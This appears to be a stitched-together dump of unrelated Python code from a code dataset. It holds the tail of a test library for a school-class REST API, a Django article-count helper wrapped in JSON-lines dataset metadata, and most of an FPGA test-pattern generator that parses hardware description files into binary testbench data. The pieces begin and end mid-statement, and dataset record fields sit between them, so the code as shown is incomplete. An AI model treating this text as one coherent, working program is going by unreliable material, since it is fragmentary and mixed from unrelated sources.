url='{}/{}'.format(self.URL,classid)\n\n response=requests.put(url,data=payload)\n\n bodyDict=response.json()\n\n pprint(bodyDict,indent=2)\n return bodyDict\n\n\n\n # Delete a class\n def delete_school_class(self,classid):\n payload={\n 'vcode':g_vcode,\n }\n\n url='{}/{}'.format(self.URL,classid)\n\n response=requests.delete(url,data=payload)\n\n bodyDict=response.json()\n\n pprint(bodyDict,indent=2)\n return bodyDict\n\n\n\n # Delete all classes\n def delete_all_school_classes(self):\n # list all classes\n rd = self.list_school_class()\n pprint(rd,indent=2)\n\n # delete every class we just listed\n for one in rd['retlist']:\n self.delete_school_class(one['id'])\n\n rd = self.list_school_class()\n pprint(rd, indent=2)\n\n # classes still remain, so raise an exception\n if rd['retlist']!=[]:\n raise Exception(\"cannot delete all school classes!\")\n\n def classlist_should_contain(self,\n classlist,\n classname,\n gradename,\n invitecode,\n studentlimit,\n studentnumber,\n classid,\n expectedtimes=1\n ):\n\n item = {\n \"name\": classname,\n \"grade__name\": gradename,\n \"invitecode\": invitecode,\n \"studentlimit\": int(studentlimit),\n \"studentnumber\": int(studentnumber),\n \"id\": classid,\n \"teacherlist\": []\n }\n\n occurTimes = classlist.count(item)\n logger.info('occur {} times'.format(occurTimes))\n\n if occurTimes != expectedtimes:\n # raise an exception so the keyword fails\n\n raise Exception(\n 'class list contains your class info {} times, expected {} times!'.format(\n occurTimes, expectedtimes)\n )\n\n\n\n def classlist_should_not_contain(self,\n classlist,\n classname,\n gradename,\n invitecode,\n studentlimit,\n studentnumber,\n classid\n ):\n\n item = {\n \"name\": classname,\n \"grade__name\": gradename,\n \"invitecode\": invitecode,\n \"studentlimit\": int(studentlimit),\n \"studentnumber\": int(studentnumber),\n \"id\": classid,\n \"teacherlist\": []\n }\n\n occurTimes = classlist.count(item)\n logger.info('occur {} times'.format(occurTimes))\n\n if occurTimes > 0:\n # raise an exception so the keyword fails\n\n raise Exception('class list contains the specified class info')\n\n\n\n\nif __name__ == '__main__':\n scm = SchoolClassLib()\n\n # ret1 = scm.list_school_class(1)\n\n ret2 = scm.add_school_class(1,'1班',60)\n\n ret3 = scm.list_school_class(1)\n\n ret4 = 
    monday = today - timedelta(days=today.weekday())\n    week_start = datetime(year=monday.year, month=monday.month, day=monday.day)\n    week_count = Article.objects.filter(site__name=site_name, timestamp__gte=week_start).count()\n\n    month_start = today - timedelta(days=today.day-1)\n    month_start = datetime(year=month_start.year, month=month_start.month, day=month_start.day)\n    month_count = Article.objects.filter(site__name=site_name, timestamp__gte=month_start).count()\n\n    return tuple(zip(PERIODS, (all_count, today_count, yesterday_count, week_count, month_count)))\n","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"339291850","text":"#!/usr/bin/python3\n"""\nDate: 12/19/2018\nVersion: 2.1.1\nAuthor: Kang Chuanliang\nSummary:\n\n"""\nimport re, sys, os, struct\nimport json\nimport bs4\nimport time\nfrom importlib import util\nif util.find_spec("filebrowser"):\n\tfrom filebrowser.sites import site\n\tDIRECTORY = os.path.join(site.storage.location, "uploads") # /path/to/mysite/uploads/\nelse:\n\tprint("filebrowser not found!")\n\tDIRECTORY = sys.path[0] # os.path.join(sys.path[0], 'uploads')\n\n# import timeit\n\nPROJECT_PATH = '' # /mysite/uploads/project/\nINCLUDE_PATH = 'include' # /mysite/tools/include/\n\n# define operation code here\n# MASK_OP = 0x1\n# BITSTREAM_OP = 0x2\n# TESTBENCH_OP = 0x4\n# END_OP = 0x80\nMASK_OP = b'\\x01'\nBITSTREAM_OP = b'\\x02'\nTESTBENCH_OP = b'\\x04'\nEND_OP = b'\\x80'\n# enddefine\n\n# define other global constants\nBIN_WIDTH = 128\nBIN_BYTE_WIDTH = int(BIN_WIDTH / 8)\nBITSTREAM_WIDTH = 32\nDEFAULT_SR = 1 # Default sample rate\n# end define\n\n"""Tools"""\n\n\ndef timer(func):\n\t# decorator without parameter\n\tdef _timer(self):\n\t\tstart_time = time.time()\n\t\tfunc(self)\n\t\tend_time = time.time()\n\t\tprint("\\nTotal time: " + str(end_time - start_time))\n\n\treturn _timer\n\n\ndef name_check(file, name):\n\tfilename = os.path.splitext(file)[0]\n\tif filename == name:\n\t\tprint(file + " name check pass!")\n\telse:\n\t\tprint(file + " name mismatch!")\n\n\ndef get_soup(path, file):\n\tpath = os.path.join(path, file)\n\t# print(path)\n\twith open(path, "r") as f:\n\t\tsoup = bs4.BeautifulSoup(f.read(), "xml")\n\treturn soup\n\n\ndef txt2pio_ucf(txt, pio, ucf):\n\twith open(txt, 'r') as ft, open(pio, 'w') as fp, open(ucf, 'w') as fu:\n\t\tregex = 
re.compile(r'(input|output)s\\[\"(.*)\"\\]\\s+=\\s+(.*)')\n\t\tfor line in ft.readlines():\n\t\t\tm = regex.match(line)\n\t\t\tif m:\n\t\t\t\tline_pio = 'NET \"{}\" DIR = {};\\n'.format(m.group(2), m.group(1))\n\t\t\t\tline_ucf = 'NET \"{}\" LOC = {};\\n'.format(m.group(2), m.group(3))\n\t\t\t\tfp.write(line_pio)\n\t\t\t\tfu.write(line_ucf)\n\n\n\"\"\"Write operation, mask, or testbench\"\"\"\n\n\ndef write_content(fw, pos_dict, base=[0]*16):\n\tif not pos_dict:\n\t\treturn\n\tnumbers = base[:]\n\t# print(numbers)\n\tfor key, value in pos_dict.items():\n\t\tif key:\n\t\t\tnumbers[key[0] - 1] += 2 ** key[1] * int(value)\n\t\t# numbers[key[0]-1] += int(value) << key[1] # shift operation is faster?\n\tfor num in numbers:\n\t\t# fw.write(struct.pack('B', num))\n\t\tif num:\n\t\t\tcontent = struct.pack('B', num)\n\t\telse:\n\t\t\tcontent = b'\\x00'\n\t\tfw.write(content)\n\n\ndef write_operator(fw, operator, length):\n\tfw.write(operator + b'\\xff' * 11 + struct.pack('>I', length))\n\t# fw.write(operator) # 1 byte\n\t# # for i in range(11): # length takes 4 bytes\n\t# # \tfw.write(struct.pack('B', 0xff))\n\t# fw.write(b'\\xff' * 11)\n\t# fw.write(struct.pack('>I', length)) # 4 bytes, big-endian\n\n\ndef write_tb_op(fw, tb_counter):\n\tif tb_counter:\n\t\toffset = - int((tb_counter + 1) * BIN_BYTE_WIDTH)\n\t\tfw.seek(offset, 1) # locate the beginning of testbench\n\t\twrite_operator(fw, TESTBENCH_OP, tb_counter)\n\t\tfw.seek(0, 2) # return to end of file\n\n\ndef write_length(fw, length):\n\tif length:\n\t\toffset = - int(length * BIN_BYTE_WIDTH + 4)\n\t\tfw.seek(offset, 1) # locate the beginning of testbench\n\t\tfw.write(struct.pack('>I', length))\n\t\tfw.seek(0, 2) # return to end of file\n\n\ndef write_mask(fw, sig2pos, sig2pio): # static\n\tnumbers = [0xff] * 16\n\twrite_operator(fw, MASK_OP, 1)\n\tfor key, value in sig2pos.items():\n\t\tif sig2pio.setdefault(key, None) == 'input': # TODO: maybe value in pio_dict should be 0/1?\n\t\t\tnumbers[value[0] - 1] -= 2 ** value[1]\n\tfor num in numbers:\n\t\tfw.write(struct.pack('B', num))\n\n\ndef get_sig_value(dictionary, tick=0):\n\t\"\"\"\n\tformat:\n\t\tflag = 'const': value = 0/1, default = (don't care)\n\t\tflag = 'square': value = (don't care), default = 0/1\n\t\tflag = 'T': value=[[number1, 0/1], [number2, 0/1], ...], default = 0/1\n\t:param dictionary:\n\t:param tick:\n\t:return:\n\t\"\"\"\n\tvalue = dictionary.setdefault('value', 0)\n\tflag = dictionary.setdefault('flag', 'const')\n\tdefault = dictionary.setdefault('default', 0)\n\tif flag == 'const':\n\t\treturn value\n\tif flag == 'square':\n\t\treturn (tick + default) % 2\n\tif flag == 'T':\n\t\tvp = default\n\t\tfor t, v in value:\n\t\t\tif tick >= t:\n\t\t\t\tvp = v\n\t\t\telse:\n\t\t\t\treturn vp\n\t\treturn vp\n\n\ndef timescale_op(ts):\n\tregex = re.compile(r'(\\d+)(\\w*)', re.I)\n\tm = regex.match(ts)\n\tif m:\n\t\tunit = m.group(2)\n\t\tif unit == 'p' or unit == 'ps':\n\t\t\tmultiplier = 1\n\t\telif unit == 'n' or unit == 'ns':\n\t\t\tmultiplier = 1000\n\t\telse:\n\t\t\tmultiplier = 1000000\n\t\tts_int = int(m.group(1)) * multiplier\n\telse:\n\t\tts_int = 1\n\treturn ts_int\n\n\ndef find_diff(x, y):\n\t# Compare two integers and return the difference.\n\tbit2val = {}\n\txor = x ^ y\n\tfor i in range(8):\n\t\tif (1 << i) & xor:\n\t\t\tbit2val[i] = (x >> i) & 1\n\treturn bit2val\n\n\ndef get_symbol(signal, sig2sym):\n\tif signal in sig2sym:\n\t\treturn sig2sym[signal]\n\telse:\n\t\tfor key in sig2sym:\n\t\t\tif signal in key:\n\t\t\t\treturn sig2sym[key]\n\t\treturn None\n\n\ndef 
expand_bus(sorted_sym2sig):\n\toffset = 0\n\tsorted_exp_sym2sig = []\n\tfor sym, sig in sorted_sym2sig:\n\t\tif isinstance(sig, tuple):\n\t\t\tbus, msb, lsb = sig\n\t\t\tstep = msb > lsb and -1 or 1\n\t\t\tfor i in range(msb, lsb+step, step):\n\t\t\t\tsorted_exp_sym2sig.append((sym, '{}[{}]'.format(bus, i)))\n\t\t\t\tsym = chr(ord(sym) + 1)\n\t\t\toffset += abs(msb-lsb)\n\t\telse:\n\t\t\tsym = chr(ord(sym) + offset)\n\t\t\tsorted_exp_sym2sig.append((sym, sig))\n\treturn sorted_exp_sym2sig\n\n\ndef tfo_parser(path, file):\n\t"""\n\t:param path:\n\t:param file:\n\t:return file_list_list:\n\t"""\n\tfile_list_list = {}\n\tsoup = get_soup(path, file)\n\tname_check(file, soup.TFO['name'])\n\tfor test_tag in soup.find_all('TEST'):\n\t\tfile_list = {\n\t\t\t'PTN': test_tag['name'] + '.ptn',\n\t\t\t'LBF': soup.TFO.LBF['type'] + '.lbf',\n\t\t\t'TCF': 'F93K.tcf'\n\t\t}\n\t\tproject_name = test_tag['name']\n\t\tfor child in test_tag.children:\n\t\t\tif type(child) == bs4.element.Tag:\n\t\t\t\tif child.name == 'DWM' or child.name == 'BIT':\n\t\t\t\t\tfile_list[child.name] = child['name']\n\t\t\t\telse:\n\t\t\t\t\tfile_list[child.name] = child['name'] + '.' + child.name.lower()\n\t\tfile_list_list[test_tag['path']] = (project_name, file_list)\n\tprint(file_list_list)\n\treturn file_list_list\n\n\nclass PatternGen(object):\n\t# path and file\n\tproject_name = ''\n\tpath = '.'\n\t# command = []\n\tinclude_path = os.path.join(DIRECTORY, INCLUDE_PATH)\n\tfile_list = {'TCF': 'F93K.tcf', 'ATF': 'test_tri.atf'}\n\tconfig = {'sr': 1, 'command': 'normal'} # 'sr' is the sample rate from the .tcf file\n\n\t# variable\n\ttick = 0 # write clock\n\tbs_start = 0 # start of bitstream\n\tcclk_pos = (0, 0) # position of cclk, used for writing nop\n\tlast_pos2val = {} # record the information of the last content\n\ttrf_param = {'vcd_list': [], 'bs_len': 0} # parameter for trf2vcd()\n\tdigital_param = {'period': '1u', 'multiple': 1} # parameter from ITM file\n\ttotal_length = 0 # global counter of the pattern\n\tbase_0 = []\n\tbase_1 = []\n\n\t# signal dictionary\n\tcmd2spio = {}\n\tcmd2pos = {}\n\tcmd2flag = {}\n\tpos2data = {}\n\tnop = {}\n\n\tsig2pio = {}\n\tsig2pos = {}\n\tsym2sig = {}\n\tentri_dict = {}\n\n\tdef __init__(self, path='.', tfo_file='tfo_demo', command='-normal', file_list=()):\n\t\tself.project_name = path\n\t\tself.path = os.path.join(DIRECTORY, path)\n\t\t# self.command = command.split('-') # Get command: -normal, -legacy, ...\n\t\tself.config['command'] = command.split('-') # Get command: -normal, -legacy, ...\n\t\tif file_list:\n\t\t\tself.project_name, self.file_list = file_list\n\t\telse:\n\t\t\tself.tfo_parser(tfo_file) # Get position of user files.\n\t\tself.atf_parser(self.file_list['ATF']) # Get position of include files.\n\t\tself.itm_parser(self.file_list['ITM'])\n\t\t# print(self.file_list)\n\n\t\t# initialize bitstream info\n\t\tself.cmd2spio, whatever = self.pio_parser(self.include_path, self.file_list['SPIO'])\n\t\tcmd2pin = self.ucf_parser(self.include_path, self.file_list['SUCF'])\n\t\tcmd2channel = self.lbf_parser(self.file_list['LBF'], cmd2pin)\n\t\tself.cmd2pos = self.tcf_parser(self.file_list['TCF'], cmd2channel)\n\t\tself.sbc_parser(self.file_list['SBC'])\n\t\tself.cclk_pos = self.cmd2pos['CCLK']\n\n\t\t# initialize testbench info\n\t\tself.sig2pio, self.entri_dict = self.pio_parser(self.path, self.file_list['PIO'])\n\t\tsig2pin = self.ucf_parser(self.path, self.file_list['UCF'])\n\t\tsig2channel = 
self.lbf_parser(self.file_list['LBF'], sig2pin)\n\t\tself.sig2pos = self.tcf_parser(self.file_list['TCF'], sig2channel)\n\n\t\t# get symbol2signal dictionary from vcd/txt file\n\t\tself.sym2sig = self.get_sym2sig()\n\n\tdef tfo_parser(self, file):\n\t\t\"\"\"\n\t\tTODO: Multiple TEST tag, different attr 'name' and 'path'.\n\t\tTODO: Return file_dict like {test1:{path:'path', file1:'file1', ...}, test2:{...}, ...}.\n\t\tFormat: {\"lbf\":\"LB010tf1\", dut:\"LX200\", \"test\":{\"pin_test\":{\"path\":\".\", }}}\n\t\t:param file:\n\t\t:return file_dict:\n\t\t\"\"\"\n\t\tsoup = get_soup(self.path, file)\n\t\tname_check(file, soup.TFO['name'])\n\t\tself.file_list['LBF'] = soup.TFO.LBF['type'] + '.lbf'\n\t\ttest_tag = soup.find('TEST')\n\t\tself.project_name = test_tag['name']\n\t\tself.file_list['PTN'] = test_tag['name'] + '.ptn'\n\t\t# self.path = test_tag['path']\n\t\tfor child in test_tag.children:\n\t\t\tif type(child) == bs4.element.Tag:\n\t\t\t\tif child.name == 'DWM' or child.name == 'BIT':\n\t\t\t\t\tself.file_list[child.name] = child['name']\n\t\t\t\telse:\n\t\t\t\t\tself.file_list[child.name] = child['name'] + '.' + child.name.lower()\n\n\tdef itm_parser(self, file):\n\t\tsoup = get_soup(self.path, file)\n\t\tname_check(file, soup.ITEM['name'])\n\t\t# print(type(soup.find('DIGITAL').CYCLE))\n\t\tself.digital_param['period'] = soup.find('DIGITAL').CYCLE.get('period')\n\t\t# self.digital_param['period'] = soup.find('DIGITAL').CYCLE.setdefault('period', '1u')\n\t\t# self.digital_param['multiple'] = soup.find('DIGITAL').CYCLE.setdefault('multiple', '1')\n\n\t@staticmethod\n\tdef pio_parser(path, file):\n\t\tpio_dict = {}\n\t\tentri_dict = {}\n\t\tpath = os.path.join(path, file)\n\t\tregex = re.compile(r'NET\\s+\"(.+)\"\\s+DIR\\s*=\\s*(input|output|inout)(.*);', re.I)\n\t\tregex2 = re.compile(r'.*\"(.*)\"\\s*')\n\t\twith open(path, \"r\") as f:\n\t\t\tfor line in f.readlines():\n\t\t\t\tm = regex.match(line)\n\t\t\t\tif m:\n\t\t\t\t\t# print(m.groups())\n\t\t\t\t\tio = m.group(2).lower()\n\t\t\t\t\tpio_dict[m.group(1)] = io\n\t\t\t\t\tif io == 'inout':\n\t\t\t\t\t\ttri = regex2.match(m.group(3)).group(1)\n\t\t\t\t\t\tif tri not in entri_dict:\n\t\t\t\t\t\t\tentri_dict[tri] = [m.group(1)]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tentri_dict[tri].append(m.group(1))\n\t\t# print(pio_dict, entri_dict)\n\t\treturn pio_dict, entri_dict\n\n\t@staticmethod\n\tdef ucf_parser(path, file):\n\t\tsig2pin = {}\n\t\tpath = os.path.join(path, file)\n\t\tregex = re.compile(r'NET\\s+\"(.+)\"\\s+LOC =(.+);', re.I)\n\t\twith open(path, \"r\") as f:\n\t\t\tfor line in f.readlines():\n\t\t\t\tm = regex.match(line)\n\t\t\t\tif m:\n\t\t\t\t\tsig2pin[m.group(1)] = m.group(2).strip()\n\t\treturn sig2pin\n\n\tdef atf_parser(self, file):\n\t\t# print(self.path)\n\t\tsoup = get_soup(self.path, file)\n\t\tname_check(file, soup.ATF['name'])\n\t\tdwm_tag = soup.ATF.LIST.DWM\n\t\tfor child in dwm_tag.children:\n\t\t\tif type(child) == bs4.element.Tag:\n\t\t\t\tself.file_list[child.name] = child['name'] + '.' 
+ child.name.lower()\n\n\tdef lbf_parser(self, file, sig2pin):\n\t\tsoup = get_soup(self.include_path, file)\n\t\tname_check(file, soup.LBF['name'])\n\t\t# dut_tag = soup.find('DUT').children\n\t\tsig2channel = {}\n\t\tfor key in sig2pin:\n\t\t\tconnect_tag = soup.find(pin=sig2pin[key])\n\t\t\tif connect_tag: # collect exception\n\t\t\t\tsig2channel[key] = connect_tag['channel']\n\t\t\telse:\n\t\t\t\tsig2channel[key] = None\n\t\treturn sig2channel\n\n\tdef tcf_parser(self, file, sig2channel):\n\t\tsoup = get_soup(self.include_path, file)\n\t\tname_check(file, soup.TCF['name'])\n\t\tsig2pos = {}\n\t\tfor key, value in sig2channel.items():\n\t\t\t# FRAME & ASSEMBLY tag\n\t\t\tconnect_tag = soup.find(pogo=value[:3])\n\t\t\tassembly_name = connect_tag['assembly'] # should search by 'AS0101',\n\t\t\twire_tag = soup.find(code=assembly_name).find(pogopin=value[3:]) # not this\n\t\t\tchannel = connect_tag['plug'] + wire_tag['plugpin']\n\n\t\t\tself.config['sr'] = int(soup.find('CARD').get('samplerate') or DEFAULT_SR) # Get sample rate, default is 1\n\n\t\t\t# SIGMAP tag\n\t\t\tmapping_tag = soup.find(channel=channel)\n\t\t\tbyte = int(mapping_tag['byte'])\n\t\t\tbit = int(mapping_tag['bit'])\n\t\t\tsig2pos[key] = (byte, bit)\n\t\treturn sig2pos\n\n\tdef txt_parser(self, fw):\n\t\ttb_counter = -1 # length of test bench in operation code\n\t\t# def_state = True # definition state\n\t\tx_val = 0 # default value of x\n\t\tz_val = 0\n\t\tperiod = self.digital_param['period_int']\n\t\tpos2val = {} # {position(bit): signal(1|0|z|x)}\n\t\tpath = os.path.join(self.path, self.file_list['TXT'])\n\t\t# regex1 = re.compile(r'(.)\\s+(.*)\\s+(input|output)', re.I) # match signal name\n\t\t# regex1 = re.compile(r'(.)\\s+(\\w+)\\s*(\\[(\\d+)(:?)(\\d*)\\])?\\s+(input|output)', re.I) # match signal name\n\t\tregex2 = re.compile(r'^\\*{10}') # match period partition\n\t\tregex3 = re.compile(r'(.)\\s+b([0|1|x|z]+)') # match test bench\n\n\t\twith open(path, \"r\") as f:\n\t\t\tif not self.entri_dict:\n\t\t\t\twrite_mask(fw, self.sig2pos, self.sig2pio)\n\t\t\t\twrite_operator(fw, TESTBENCH_OP, 0)\n\t\t\t\tself.total_length += 3\n\t\t\tline = 1\n\t\t\twhile line:\n\t\t\t\tline = f.readline()\n\t\t\t\t# match next tick; write last tick to file\n\t\t\t\tm2 = regex2.match(line)\n\t\t\t\tif m2 and regex2.match(f.readline()): # skip 2nd star row # WARNING\n\t\t\t\t\t# print('write')\n\t\t\t\t\t# print(pos2val)\n\t\t\t\t\twrite_content(fw, pos2val) # Write testbench to binary file. 
Skip the first * line.\n\t\t\t\t\ttb_counter += 1\n\t\t\t\t\tself.total_length += 1\n\t\t\t\t\tcontinue\n\n\t\t\t\t# match testbench\n\t\t\t\tm3 = regex3.match(line)\n\t\t\t\tif m3:\n\t\t\t\t\tkey = m3.group(1)\n\t\t\t\t\tif key not in self.sym2sig:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tvalue = m3.group(2)\n\t\t\t\t\tif isinstance(self.sym2sig[key], tuple):\n\t\t\t\t\t\tbus_ele = self.sym2sig[key]\n\t\t\t\t\t\tbus_width = bus_ele[1] - bus_ele[2]\n\t\t\t\t\t\tbus_signal = bus_width > 0 and 1 or -1\n\t\t\t\t\t\tvalue = '0' * (abs(bus_width) - len(value)) + value # Fill 0 on the left\n\t\t\t\t\t\tfor i in range(0, bus_width + bus_signal, bus_signal):\n\t\t\t\t\t\t\tbus_sig = '{}[{}]'.format(bus_ele[0], str(bus_ele[1] - i))\n\t\t\t\t\t\t\tpos2val[self.sig2pos.setdefault(bus_sig, None)] = value[abs(i)]\n\t\t\t\t\t# print('signal = %s, value = %s' % (bus_sig, value[abs(i)]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tif value == 'x':\n\t\t\t\t\t\t\tvalue = x_val\n\t\t\t\t\t\tif value == 'z':\n\t\t\t\t\t\t\tvalue = z_val\n\t\t\t\t\t\tpos2val[self.sig2pos.setdefault(self.sym2sig[key], None)] = value\n\t\t\t\t\tif self.sym2sig[key] in self.entri_dict:\n\t\t\t\t\t\tentri_list = self.entri_dict[self.sym2sig[key]]\n\t\t\t\t\t\tfor entri in entri_list:\n\t\t\t\t\t\t\tif value == '1':\n\t\t\t\t\t\t\t\tself.sig2pio[entri] = 'output'\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.sig2pio[entri] = 'input'\n\t\t\t\t\t\twrite_length(fw, tb_counter)\n\t\t\t\t\t\t# self.trf_param['vcd_list'].append(tb_counter) # txt length is inaccurate\n\t\t\t\t\t\twrite_mask(fw, self.sig2pos, self.sig2pio)\n\t\t\t\t\t\twrite_operator(fw, TESTBENCH_OP, 0)\n\t\t\t\t\t\tself.total_length += 3\n\t\t\t\t\t\ttb_counter = 0\n\t\t\twrite_content(fw, pos2val)\n\t\t\ttb_counter += 1\n\t\t\tself.total_length += 1\n\t\t\t# print(tb_counter)\n\t\t\twrite_length(fw, tb_counter)\n\n\tdef vcd_parser(self, fw):\n\t\ttick = -1 # current tick\n\t\ttb_counter = -1 # length of testbench in operation code\n\t\tx_val = 0 # default value of x\n\t\tz_val = 0\n\t\tperiod = self.digital_param['period_int']\n\t\tvcd_list = []\n\t\tpos2val = {} # {position(bit): signal(1|0|z|x)}\n\t\tpath = os.path.join(self.path, self.file_list['VCD'])\n\t\tregex2 = re.compile(r'#(\\d+)') # match period\n\t\tregex3 = re.compile(r'b?([0|1|x|z]+)\\s*(.)') # match testbench\n\n\t\twith open(path, \"r\") as f:\n\t\t\tif not self.entri_dict:\n\t\t\t\twrite_mask(fw, self.sig2pos, self.sig2pio)\n\t\t\t\twrite_operator(fw, TESTBENCH_OP, 0)\n\t\t\t\tself.total_length += 3\n\t\t\tfor line in f.readlines():\n\t\t\t\t# end of file\n\t\t\t\tif line[:8] == '$dumpoff':\n\t\t\t\t\tbreak\n\t\t\t\t# match next tick; write last tick to file\n\t\t\t\tm2 = regex2.match(line)\n\t\t\t\tif m2:\n\t\t\t\t\tvcd_tick_raw = int(m2.group(1))\n\t\t\t\t\tif vcd_tick_raw % period: # small delay, skip the write operation\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telse:\n\t\t\t\t\t\tvcd_tick = int(vcd_tick_raw / period)\n\t\t\t\t\twhile True:\n\t\t\t\t\t\twrite_content(fw, pos2val) # Write testbench to binary file.\n\t\t\t\t\t\ttb_counter += 1\n\t\t\t\t\t\ttick += 1\n\t\t\t\t\t\tself.total_length += 1\n\t\t\t\t\t\tif tick == vcd_tick:\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tcontinue\n\t\t\t\t# if m2:\n\t\t\t\t# \tvcd_tick = m2.group(1)\n\t\t\t\t# \twhile True:\n\t\t\t\t# \t\twrite_content(fw, pos2val) # Write testbench to binary file.\n\t\t\t\t# \t\ttb_counter += 1\n\t\t\t\t# \t\ttick += 1\n\t\t\t\t# \t\tself.total_length += 1\n\t\t\t\t# \t\tif tick == int(vcd_tick):\n\t\t\t\t# \t\t\tbreak\n\t\t\t\t# \tcontinue\n\n\t\t\t\t# match 
testbench\n\t\t\t\tm3 = regex3.match(line)\n\t\t\t\tif m3:\n\t\t\t\t\tvalue = m3.group(1)\n\t\t\t\t\tkey = m3.group(2)\n\t\t\t\t\tif key not in self.sym2sig:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t# pos2val[self.sig2pos.setdefault(self.sym2sig[key], None)] = value\n\t\t\t\t\tif isinstance(self.sym2sig[key], tuple):\n\t\t\t\t\t\tbus_ele = self.sym2sig[key]\n\t\t\t\t\t\tbus_width = bus_ele[1] - bus_ele[2]\n\t\t\t\t\t\t# print(\"{} {}\".format(bus_width, bus_ele))\n\t\t\t\t\t\tbus_signal = bus_width > 0 and 1 or -1\n\t\t\t\t\t\tvalue = '0' * (abs(bus_width) + 1 - len(value)) + value # Fill 0 on the left\n\t\t\t\t\t\tfor i in range(0, bus_width + bus_signal, bus_signal):\n\t\t\t\t\t\t\tbus_sig = '{}[{}]'.format(bus_ele[0], str(bus_ele[1] - i))\n\t\t\t\t\t\t\t# print(\"tick={} {} {}\".format(tick, bus_sig, self.sig2pos))\n\t\t\t\t\t\t\t# print(\"i={}, value={}\".format(i, value))\n\t\t\t\t\t\t\tpos2val[self.sig2pos.setdefault(bus_sig, None)] = value[abs(i)]\n\t\t\t\t\t\t\t# print('ok')\n\t\t\t\t\t# print('signal = %s, value = %s' % (bus_sig, value[abs(i)]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tif value == 'x':\n\t\t\t\t\t\t\tvalue = x_val\n\t\t\t\t\t\tif value == 'z':\n\t\t\t\t\t\t\tvalue = z_val\n\t\t\t\t\t\tpos2val[self.sig2pos.setdefault(self.sym2sig[key], None)] = value\n\t\t\t\t\tif self.sym2sig[key] in self.entri_dict:\n\t\t\t\t\t\tentri_list = self.entri_dict[self.sym2sig[key]]\n\t\t\t\t\t\tfor entri in entri_list:\n\t\t\t\t\t\t\tif value == '1':\n\t\t\t\t\t\t\t\tself.sig2pio[entri] = 'output'\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.sig2pio[entri] = 'input'\n\t\t\t\t\t\twrite_length(fw, tb_counter)\n\t\t\t\t\t\tif tb_counter:\n\t\t\t\t\t\t\tvcd_list.append(tb_counter)\n\t\t\t\t\t\twrite_mask(fw, self.sig2pos, self.sig2pio)\n\t\t\t\t\t\twrite_operator(fw, TESTBENCH_OP, 0)\n\t\t\t\t\t\tself.total_length += 3\n\t\t\t\t\t\ttb_counter = 0\n\t\t\twrite_length(fw, tb_counter)\n\t\t\tvcd_list.append(tb_counter)\n\t\t\tself.trf_param['vcd_list'] = vcd_list\n\t\t\tself.trf_param['vcd_len'] = tick + 2 * (len(vcd_list) - 1) # Warning\n\n\tdef sbc_parser(self, file):\n\t\tsoup = get_soup(self.include_path, file)\n\t\tname_check(file, soup.SBC['name'])\n\n\t\t# Handle SIG tag\n\t\tfor element in soup.find_all('SIG'):\n\t\t\tele_value = element['value']\n\t\t\tregex1 = re.compile(r'(const)([0|1])') # flag = const\n\t\t\tm1 = regex1.search(ele_value) # const has the highest priority\n\t\t\tif m1:\n\t\t\t\tflag, value = m1.groups()\n\t\t\t\tvalue = int(value)\n\t\t\telse:\n\t\t\t\tregex2 = re.compile(r'^(square)(\\d+)T$') # flag = square\n\t\t\t\tm2 = regex2.match(ele_value)\n\t\t\t\tif m2:\n\t\t\t\t\tflag, value = m2.groups()\n\t\t\t\t\tvalue = int(value)\n\t\t\t\telse:\n\t\t\t\t\tregex3 = re.compile(r'(\\d+)T([0|1])') # flag = T\n\t\t\t\t\tm3 = regex3.findall(ele_value)\n\t\t\t\t\tif m3:\n\t\t\t\t\t\tvalue = [list(map(int, x)) for x in m3]\n\t\t\t\t\t\tflag = 'T'\n\t\t\t\t\telse: # collect default\n\t\t\t\t\t\tflag = ''\n\t\t\t\t\t\tvalue = 0\n\t\t\tdefault = int(element['default'])\n\t\t\tself.cmd2flag[element['name']] = {'value': value, 'flag': flag, 'default': default}\n\n\t\t# Handle BTC tag\n\t\tbtc_tag = soup.find('BTC')\n\t\tself.bs_start = int(btc_tag['start'][:-1])\n\t\tfor child in btc_tag.find_all('DATA'):\n\t\t\tnum = (int(child['byte']) - 1) * 8 + 7 - int(child['bit'])\n\t\t\tself.pos2data[num] = child['name']\n\n\t\t# Handle NOP tag\n\t\tnop_tag = soup.find('NOP')\n\t\tself.nop['start'] = nop_tag['start']\n\t\tself.nop['cycle'] = int(nop_tag['cycle'][:-1])\n\n\tdef rbt_generator(self, 
file):\n\t\t\"\"\"\n\t\tGenerator, yield the position of bitstream.\n\t\t:return:\n\t\t\"\"\"\n\t\tpath = os.path.join(self.path, file)\n\t\twith open(path, 'r') as f:\n\t\t\tfor i in range(7): # skip the first 7 lines\n\t\t\t\tf.readline()\n\t\t\twhile True:\n\t\t\t\tline = f.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\tyield line\n\n\tdef get_sym2sig(self): # get sym2val and timescale from VCD file\n\t\tsym2sig = {}\n\t\tif 'legacy' in self.config['command']:\n\t\t\tpath = os.path.join(self.path, self.file_list['TXT'])\n\t\t\tregex1 = re.compile(r'(.)\\s+(\\w+)\\s*(\\[(\\d+)(:?)(\\d*)\\])?\\s+(input|output)', re.I)\n\t\t\tregex2 = re.compile(r'^\\*{10}')\n\t\telse:\n\t\t\tpath = os.path.join(self.path, self.file_list['VCD'])\n\t\t\tregex1 = re.compile(r'\\$var\\s+\\w+\\s+\\d+\\s+(.)\\s+(\\w+)\\s*(\\[(\\d+)(:?)(\\d*)\\])?\\s+\\$end', re.I)\n\t\t\tregex2 = re.compile(r'\\$enddefinitions \\$end')\n\t\tregex3 = re.compile(r'\\$timescale')\n\t\twith open(path, \"r\") as f:\n\t\t\tline = f.readline()\n\t\t\twhile line:\n\t\t\t\tif regex2.match(line): # definition end\n\t\t\t\t\tbreak\n\t\t\t\tif regex3.match(line): # get timescale\n\t\t\t\t\tm3 = re.match(r'\\s*(\\d+\\w+)\\s*', f.readline())\n\t\t\t\t\ttimescale = m3.group(1)\n\t\t\t\t\tself.digital_param['period_int'] = 